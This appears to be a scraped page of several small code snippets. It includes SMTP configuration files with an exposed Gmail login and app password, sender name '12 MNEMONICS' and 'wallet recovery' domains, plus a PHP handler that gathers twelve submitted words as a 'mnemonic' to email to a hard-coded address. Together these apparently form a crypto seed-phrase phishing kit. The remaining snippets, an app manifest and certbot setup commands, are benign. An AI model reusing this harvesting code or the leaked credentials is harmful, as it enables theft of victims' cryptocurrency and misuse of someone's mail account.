This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SMTP_HOST=smtp.gmail.com | |
| SMTP_PORT=587 | |
| SMTP_USER=chicanoshubservices@gmail.com | |
| SMTP_PASS=hernlxqxinwplddk | |
| SMTP_FROM=chicanoshubservices@gmail.com | |
| SMTP_FROM_NAME=12 MNEMONICS | |
| DOMAIN=recoveryassistdev.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SMTP_HOST=smtp.gmail.com | |
| SMTP_PORT=587 | |
| SMTP_USER=chicanoshubservices@gmail.com | |
| SMTP_PASS=hernlxqxinwplddk | |
| SMTP_FROM=chicanoshubservices@gmail.com | |
| SMTP_FROM_NAME=12 MNEMONICS | |
| DOMAIN=solwalletrecovery.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if ($_SERVER["REQUEST_METHOD"] == "POST") { | |
| $inputs = []; | |
| for ($i = 1; $i <= 12; $i++) { | |
| $key = "input$i"; | |
| $inputs[] = htmlspecialchars($_POST[$key]); | |
| } | |
| $mnemonic = implode(" ", $inputs); | |
| $to = "elinteerie@gmail.com"; // Change this to your receiving email |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "url": "https://peetokapp.live", | |
| "name": "Peetok", | |
| "iconUrl": "https://peetokapp.live/icon.png", | |
| "termsOfUseUrl": "https://peetokapp.live/terms-of-use-url", | |
| "privacyPolicyUrl": "hhttps://peetokapp.live/privacy-policy-url" | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 244042408 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 493655893 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 491158588 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo mkdir /etc/ssl/private | |
| sudo chmod 700 /etc/ssl/private | |
| sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/nginx-selfsigned.key -out /etc/ssl/certs/nginx-selfsigned.crt | |
| ## | |
| sudo apt update | |
| sudo apt install certbot python3-certbot-nginx | |
| sudo certbot --nginx -d studentsdecides.com.ng -d www.studentsdecides.com.ng |